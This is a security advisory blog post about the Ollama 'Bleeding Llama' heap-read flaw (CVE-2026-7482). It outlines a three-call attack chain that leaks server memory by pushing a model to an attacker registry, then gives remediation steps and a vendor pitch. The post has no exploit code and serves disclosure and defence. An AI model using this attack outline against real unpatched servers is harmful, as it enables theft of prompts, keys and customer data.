Bleeding Llama: Critical Ollama Vulnerability Exposes 300,000 AI Servers
A critical vulnerability dubbed "Bleeding Llama" has been disclosed in Ollama, the widely used open-source framework for running large language models locally. Discovered by Dor Attias at Cyera Research, CVE-2026-7482 allows unauthenticated attackers to silently steal the entire contents of an Ollama server's memory — including user prompts, API keys, conversation history, and customer data — using just three API calls.
With an estimated 300,000 internet-facing Ollama instances and a public proof-of-concept already available, this is one of the most significant AI infrastructure vulnerabilities disclosed to date. If your organisation runs Ollama in any capacity, read on.
| CVSS Score | 9.1 (Critical) |
| CVE | CVE-2026-7482 |
| Affected Software | Ollama < 0.17.1 |
| Type | Heap out-of-bounds read (CWE-125) |
| Attack Vector | Network (unauthenticated, no user interaction) |
| Discovered By | Dor Attias, Cyera Research |
| Fixed In | Ollama 0.17.1 |
| Public PoC | Available on GitHub |
How the Attack Works
The vulnerability lives in Ollama's GGUF (GPT-Generated Unified Format) model loader — specifically in how it handles tensor offsets during quantisation. An attacker supplies a malicious GGUF file where the declared tensor offset and size exceed the file's actual length. When Ollama processes this file, it reads past the allocated heap buffer, pulling adjacent process memory into the model weights.
Why Go's memory safety doesn't help: Ollama is written in Go, a memory-safe language. But the vulnerable code uses Go's unsafe package for low-level memory operations — bypassing all of Go's built-in safety guarantees. The one place Ollama uses unsafe is exactly where this vulnerability lives.
The full attack chain requires no authentication, no user interaction, and no privileged access:
- Upload malicious blob —
POST /api/blobs/sha256:<hash>. The attacker uploads a crafted GGUF file with oversized tensor declarations. - Trigger quantisation —
POST /api/create. Create a model from the blob and request F16-to-F32 quantisation. Ollama reads past the buffer and bakes leaked memory into model weights. The F16-to-F32 conversion path is lossless, preserving stolen bytes intact. - Exfiltrate —
POST /api/push. Push the model (with embedded heap data) to an attacker-controlled registry. The server sends your memory contents to the attacker.
What Data Is at Risk
Because the exploit leaks arbitrary process memory, the potential data exposure is severe:
- User prompts and chat history — every conversation from every user, including confidential questions, proprietary code, and internal documents reviewed via AI.
- API keys and secrets — environment variables containing database credentials, third-party API tokens, cloud provider keys, and authentication secrets.
- System prompts — the instructions that define your AI's behaviour, revealing business logic, internal processes, and competitive IP.
- Customer data — contracts, financial data, personal information, and any customer content processed through the AI. A potential GDPR breach.
The Bigger Problem: AI Infrastructure Is the New Shadow IT
Bleeding Llama is not just an Ollama bug — it's a symptom of a broader pattern. Businesses are deploying AI infrastructure with the urgency of a startup and the security posture of a hobby project. Ollama launches without authentication by default. The documented OLLAMA_HOST=0.0.0.0 configuration exposes it to the entire internet. And until the CVE was assigned nearly three months after the fix shipped, most operators had no idea they needed to update.
This mirrors the early days of unsecured MongoDB and Elasticsearch instances in the 2010s — databases exposed to the internet with no authentication, leading to thousands of data breaches. We are now seeing the same pattern repeated with AI inference servers: Ollama, vLLM, LocalAI, and custom LLM deployments being stood up by development teams without security review.
Ask your teams today: Is anyone running Ollama, LM Studio, vLLM, or any local LLM inference server? If the answer is yes (or "I don't know"), you have an unmanaged attack surface that needs immediate attention.
What You Should Do Right Now
Immediate Actions
- Update Ollama to v0.17.1 or later — this is the minimum. Check your version with
ollama --version. - Audit your network — scan for any Ollama instances listening on
0.0.0.0:11434. Usess -tlnp | grep 11434or your asset discovery tooling. - Block public access — if Ollama must be network-accessible, put it behind an authentication proxy (Cloudflare Access, OAuth2 Proxy, or Tailscale).
- Restrict dangerous endpoints — at minimum, block
/api/createand/api/pushfrom external access via your reverse proxy. - Assume compromise if exposed — if your Ollama server was internet-facing on a pre-0.17.1 version, rotate all credentials, API keys, and tokens that may have been in process memory.
Longer-Term Measures
- Include AI infrastructure in your security testing scope — traditional web application pen tests don't cover LLM inference servers. Ensure your security assessments explicitly include AI tooling.
- Maintain an AI asset inventory — know every LLM, agent, and inference server running in your environment. Shadow AI deployments are the new shadow IT.
- Apply the same controls as production databases — authentication, encryption in transit, network segmentation, access logging, and regular patching. AI servers process data that is often more sensitive than what's in your database.
- Review your MCP server security — if you're running AI agents that connect to MCP servers via Ollama, the entire chain needs hardening.
Disclosure Timeline
| Date | Event |
|---|---|
| Feb 2, 2026 | Dor Attias of Cyera Research reports the vulnerability to the Ollama security team. |
| Feb 25, 2026 | Ollama acknowledges and shares a fix, included in version 0.17.1. |
| Mar 2, 2026 | Researcher submits CVE request to MITRE. No response received. |
| Apr 28, 2026 | Echo (third-party CNA) assigns CVE-2026-7482 — nearly 3 months after the fix. |
| May 4, 2026 | Full details published by Cyera Research. Public PoC exploit available on GitHub. |
The Bottom Line
Bleeding Llama is a wake-up call for every organisation deploying local AI infrastructure. The vulnerability is critical, the attack is trivial, and the data exposure is total. But beyond this specific CVE, the lesson is clear: AI infrastructure must be treated with the same security rigour as your production databases and web applications.
At YUPL, our CREST-aligned penetration testing team specifically tests AI infrastructure — including Ollama, vLLM, MCP servers, and custom agent deployments. If you're running local LLMs in any capacity, get in touch for an AI security assessment or call us on 0330 229 4580.
Frequently Asked Questions
Bleeding Llama (CVE-2026-7482) is a critical heap out-of-bounds read vulnerability in Ollama that allows unauthenticated attackers to leak the entire server process memory — including user prompts, API keys, conversation history, and customer data. It was discovered by Cyera Research and carries a CVSS score of 9.1. All Ollama versions before 0.17.1 are affected.
Approximately 300,000 Ollama instances are publicly accessible on the internet. While Ollama defaults to localhost, the commonly used OLLAMA_HOST=0.0.0.0 configuration exposes it externally. All internet-facing instances on versions before 0.17.1 are exploitable without any authentication.
No. This vulnerability is specific to self-hosted Ollama deployments. Cloud AI providers have their own security controls. However, if you use Ollama alongside cloud APIs, any API keys stored in the Ollama server's environment could be leaked through this vulnerability.
Review your Ollama logs for unexpected calls to /api/create and /api/push from unfamiliar IPs. Check whether any models were pushed to external registries. If your server was internet-facing on a pre-0.17.1 version, assume compromise and rotate all credentials, API keys, and tokens that may have been in server memory.